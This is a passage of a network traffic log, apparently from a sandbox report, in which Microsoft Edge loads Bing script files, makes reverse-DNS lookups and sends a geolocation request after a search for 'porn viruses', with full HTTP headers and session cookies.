Content-MD5: xMZwK0KBSElsxsIPlTMEkw==
Last-Modified: Tue, 24 Sep 2024 06:25:49 GMT
ETag: 0x8DCDC61BBB65CB9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 677c6f4a-e01e-005f-3204-17186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=406018
Expires: Thu, 10 Oct 2024 08:52:29 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144331.226883e2
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8xkvUeJjS0zgx9UJLaoz8Ih_Yy4.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/8xkvUeJjS0zgx9UJLaoz8Ih_Yy4.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 598
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 1nLWdicDwxe3KsJ1SxmxmQ==
Last-Modified: Tue, 24 Sep 2024 05:54:28 GMT
ETag: 0x8DCDC5D5A2ED889
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76f10a8e-201e-0006-4478-151de8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=236311
Expires: Tue, 08 Oct 2024 09:44:02 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144331.2268856f
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/LJBbk33xj0wpN1yZ2F5CHaTSir0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/LJBbk33xj0wpN1yZ2F5CHaTSir0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 409
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: BteUZH4yORsv/669vnijjQ==
Last-Modified: Thu, 15 Sep 2022 21:37:37 GMT
ETag: 0x8DA97628216A9C9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 542e4b23-b01e-0039-5fa2-05ffb0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=99124
Expires: Sun, 06 Oct 2024 19:37:35 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144331.226886d5
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 430
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: l5PXwpOyUFdqY44wmnrCag==
Last-Modified: Tue, 24 Sep 2024 06:55:01 GMT
ETag: 0x8DCDC65D005C0E0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e6c95ae6-c01e-0007-52ac-141c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=148489
Expires: Mon, 07 Oct 2024 09:20:20 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144331.226887fc
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PmNLAq2f0t_lcD3LTchFOVy6h-U.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/PmNLAq2f0t_lcD3LTchFOVy6h-U.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 17 Aug 2022 05:55:01 GMT
ETag: 0x8DA8015067F5B59
Content-Length: 201
Content-Type: application/x-javascript; charset=utf-8
Content-Encoding: br
Content-MD5: M3bjJ0CAgDmqFQQM+Mcpeg==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb857caa-f01e-0028-38de-f06504000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=249815
Expires: Tue, 08 Oct 2024 13:29:06 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144331.226888c4
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Gw7eETSwe7GHmKwW1lRqGPQJXRo.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Gw7eETSwe7GHmKwW1lRqGPQJXRo.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1171
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: YJcbeBoyJrUd/JMws9hIjA==
Last-Modified: Tue, 24 Sep 2024 06:06:55 GMT
ETag: 0x8DCDC5F1773EB68
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8d3828df-d01e-003a-4512-15a933000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=192598
Expires: Mon, 07 Oct 2024 21:35:30 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144332.226889fe
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/910ptS3pcIDQ7a5acMaHuQliuN0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/910ptS3pcIDQ7a5acMaHuQliuN0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 848
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: eh63mOkIBbFjgAwCOpOf1w==
Last-Modified: Tue, 24 Sep 2024 05:54:04 GMT
ETag: 0x8DCDC5D4C2FB005
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 33cfa0ae-001e-0011-07c0-15dd8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=267174
Expires: Tue, 08 Oct 2024 18:18:26 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144332.22688ade
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Xz21jpkTfbBon6hHKW7e4R7Hl0U.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Xz21jpkTfbBon6hHKW7e4R7Hl0U.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: aOJy98NWCam5NTQEQPKVXQ==
Last-Modified: Thu, 03 Oct 2024 00:29:00 GMT
ETag: 0x8DCE342607BCACB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 16638906-101e-0063-3038-16acb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 476
Vary: Accept-Encoding
Cache-Control: public, no-transform, max-age=318451
Expires: Wed, 09 Oct 2024 08:33:03 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144332.22688c3f
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/uiannz55FdT0j3p9jGwegfI5aIY.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/uiannz55FdT0j3p9jGwegfI5aIY.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: R0hRHsurcD1pLX+6Vf4lXQ==
Last-Modified: Tue, 24 Sep 2024 07:09:12 GMT
ETag: 0x8DCDC67CABA66FC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fbb72bf5-401e-0070-512a-169954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 688
Cache-Control: public, no-transform, max-age=312754
Expires: Wed, 09 Oct 2024 06:58:06 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144332.22688d17
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/KQKNm9M7e0OM4kJIo9i_NPl67J8.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/KQKNm9M7e0OM4kJIo9i_NPl67J8.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1462
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: knT11fCEUpXawxEVlIANLg==
Last-Modified: Tue, 24 Sep 2024 06:12:22 GMT
ETag: 0x8DCDC5FDA2C04B2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c60b6d46-f01e-0062-34d7-15ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=277048
Expires: Tue, 08 Oct 2024 21:03:01 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144333.22688e03
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/yjkALwKjIzPE-fFQuG0Wx49NU58.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/yjkALwKjIzPE-fFQuG0Wx49NU58.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 740
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: uJ6GjdcFvQURoM8UHyMO3A==
Last-Modified: Tue, 24 Sep 2024 07:15:24 GMT
ETag: 0x8DCDC68A891EF10
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f14a9a47-101e-0027-225d-1570d9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=224694
Expires: Tue, 08 Oct 2024 06:30:27 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144333.2268956c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 386
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 6W4GJTTFhKoLN+eXDWPo3Q==
Last-Modified: Tue, 24 Sep 2024 06:28:19 GMT
ETag: 0x8DCDC62149C3678
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 29fc27ce-701e-0037-7d71-15463f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=233007
Expires: Tue, 08 Oct 2024 08:49:17 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144350.226896c9
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 3501
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: FOSg83CHS0e4hPgLfMT99Q==
Last-Modified: Tue, 24 Sep 2024 06:58:40 GMT
ETag: 0x8DCDC665211749A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1607e216-501e-004d-73bf-152c72000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=266518
Expires: Tue, 08 Oct 2024 18:07:48 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144350.22692256
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
DNS

191.237.204.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

191.237.204.23.in-addr.arpa

IN PTR

Response

191.237.204.23.in-addr.arpa

IN PTR

a23-204-237-191deploystaticakamaitechnologiescom
DNS

191.237.204.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

191.237.204.23.in-addr.arpa

IN PTR

Response

191.237.204.23.in-addr.arpa

IN PTR

a23-204-237-191deploystaticakamaitechnologiescom
DNS

148.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.117.19.2.in-addr.arpa

IN PTR

Response

148.117.19.2.in-addr.arpa

IN PTR

a2-19-117-148deploystaticakamaitechnologiescom
DNS

148.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.117.19.2.in-addr.arpa

IN PTR

Response

148.117.19.2.in-addr.arpa

IN PTR

a2-19-117-148deploystaticakamaitechnologiescom
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 25
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 670163ccdb7d400991d33078d7145209
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-B09CUrBuyh55ep2YQHeyUflE4PX78UdbFKRAtMVCVEo='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: E95C2A2CCF59497BBE623A5842CC49E3 Ref B: LON601060102034 Ref C: 2024-10-05T16:05:32Z
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:32 GMT; path=/; HttpOnly
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:32 GMT; path=/; secure; SameSite=None
Set-Cookie: USRLOC=HS=1&BLOCK=TS=241005160532; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:32 GMT; path=/; secure; HttpOnly; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144332.184e9523
